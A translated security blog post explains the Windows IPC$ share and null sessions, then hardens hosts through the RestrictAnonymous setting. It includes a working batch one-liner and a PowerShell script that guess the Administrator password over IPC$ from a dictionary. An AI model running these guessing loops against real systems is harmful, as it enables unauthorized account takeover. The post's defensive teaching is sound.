Run the "net share" command in Windows to list the shares. In addition to the hidden administrative shares that the system enables by default, there is also a hidden share named IPC$.
[Image: output of net share, http://img1.51cto.com/attachment/201411/1/70821_1414808901iJM5.png]
This IPC$ share is a big name in the hacking world, though its heyday was a long time ago. IPC$ (inter-process communication) is the share through which an SMB session to a server is set up. When a client accesses a file server, it must first present a user name and password for authentication; once authentication succeeds, a session (a "shared connection") exists between client and server, and you can manage such connections with the net use command. For more information, see http://yttitan.blog.51cto.com/70821/1336646.
Normally the client authenticates first and then connects to the share it wants. With IPC$ you can establish the session explicitly, supplying the credentials once; every later access to that server's shares reuses the already authenticated session, so you are not prompted for credentials again.
For example, run the following command on the client (here 123 is the password of the Administrator account):
[Image: net use command establishing the IPC$ session, http://img1.51cto.com/attachment/201411/1/70821_1414808901MOyg.png]
After the session is established, the client can access the server directly as Administrator.
On systems before Windows XP SP2, if the Administrator account had no password, the system let a client establish this session with a blank password; combined with sessions opened with an empty user name and empty password, this is the famous IPC$ null session. That hole was closed in XP SP2, but IPC$ is still useful to attackers today, for example to guess the Administrator password: with a batch loop and a good dictionary, the attack is quite powerful.
The following is a one-liner from my notes. pass.txt is the dictionary file (one candidate per line), 192.168.80.128 is the target host, and successfully guessed passwords are written to 1.txt. Note that the original used a single & and 1> (which would record every candidate and overwrite the file each time); it must be && so that echo only runs when net use succeeds, and >> so that the file is appended to. If you put the line in a .bat file, write %%a instead of %a.
for /f %a in (c:\pass.txt) do net use \\192.168.80.128\IPC$ /user:Administrator %a && echo %a >> 1.txt
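The same dictionary check as a PowerShell script, added here as an example and not part of the original post. The target host 192.168.80.128, the dictionary C:\pass.txt, the output file 1.txt and the attempt cap are all assumptions, and it is meant for a lab host you own. Beyond the one-liner above it stops at the first hit, tears the session down again (net use leaves it open otherwise, and a later connection to the same server with other credentials would fail) and caps the number of attempts so that a lockout policy is not tripped:

```powershell
# Added example, not code from the original post.
# Assumptions: lab target 192.168.80.128, dictionary C:\pass.txt (one candidate per line).
param(
    [string]$Target      = '192.168.80.128',
    [string]$User        = 'Administrator',
    [string]$WordList    = 'C:\pass.txt',
    [string]$OutFile     = '.\1.txt',
    [int]   $MaxAttempts = 5    # stay below a typical account lockout threshold
)

$share = "\\$Target\IPC`$"   # backtick keeps the trailing $ literal
$tried = 0

foreach ($candidate in Get-Content -Path $WordList) {
    if ([string]::IsNullOrWhiteSpace($candidate)) { continue }
    if (++$tried -gt $MaxAttempts) {
        Write-Warning "Attempt cap ($MaxAttempts) reached, stopping."
        break
    }

    # net use exits with 0 only when the session was actually established
    net use $share $candidate /user:$User *> $null
    if ($LASTEXITCODE -eq 0) {
        "$User : $candidate" | Out-File -FilePath $OutFile -Append
        Write-Host "Session established with password '$candidate'"
        # remove the session so nothing is left behind on the target
        net use $share /delete /y *> $null
        break
    }
}
```

Run it from an ordinary PowerShell prompt; no elevation is needed on the client, since the credentials are sent to the remote host.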
There are two ways to prevent this kind of attack:
The first is to disable IPC$ altogether by stopping the Server service. Because the Server service is what provides file sharing, stopping it turns off all file sharing on the host, so this method is not recommended.
The second is to restrict the use of IPC$ sessions, which is the recommended method. It is done in the registry: open [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous] and set the value to 1. This value corresponds to the security policy "Network access: Do not allow anonymous enumeration of SAM accounts and shares"; it restricts what an anonymous (null-session) connection can learn, such as the account and share lists. It does not block sessions opened with a valid user name and password, so the dictionary loop above still works against it. What actually defeats password guessing is a strong Administrator password together with an account lockout threshold.
[Image: registry editor showing the RestrictAnonymous value, http://img1.51cto.com/attachment/201411/1/70821_1414808901FU0e.png]
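A small check-and-fix script for the second method, added here as an example and not part of the original post. It reads the current RestrictAnonymous value, sets it to 1 as described above, and then confirms that the Server service is still running and IPC$ is still shared (so that, unlike the first method, file sharing stays available). It must be run from an elevated PowerShell prompt; the registry path and value name are the ones given in the text, everything else is assumed:

```powershell
# Added example, not code from the original post. Run elevated.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RestrictAnonymous {
    # Value missing means 0 (anonymous enumeration allowed)
    $p = Get-ItemProperty -Path $lsa -Name RestrictAnonymous -ErrorAction SilentlyContinue
    if ($null -eq $p) { return 0 }
    return [int]$p.RestrictAnonymous
}

$before = Get-RestrictAnonymous
Write-Host "RestrictAnonymous before: $before"

if ($before -lt 1) {
    # Same change the post makes by hand in regedit
    Set-ItemProperty -Path $lsa -Name RestrictAnonymous -Value 1 -Type DWord
}

Write-Host "RestrictAnonymous after:  $(Get-RestrictAnonymous)"

# Method 1 would have stopped this service; with method 2 it must still be running
$srv = Get-Service -Name LanmanServer
Write-Host "Server service: $($srv.Status)"

# IPC$ is still listed; it is the session share, not a file share you can simply drop
net share | Select-String -Pattern 'IPC\$'
```

The change takes effect without a reboot for new sessions. Pair it with an account lockout threshold (Local Security Policy, Account Lockout Policy) if the host is reachable from untrusted networks, since RestrictAnonymous on its own does nothing against authenticated guessing.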
This article is from the "One Pot of Turbid Wine" blog. For more information, please contact the author.
Network Security Series 19: Prohibiting the establishment of IPC$ connections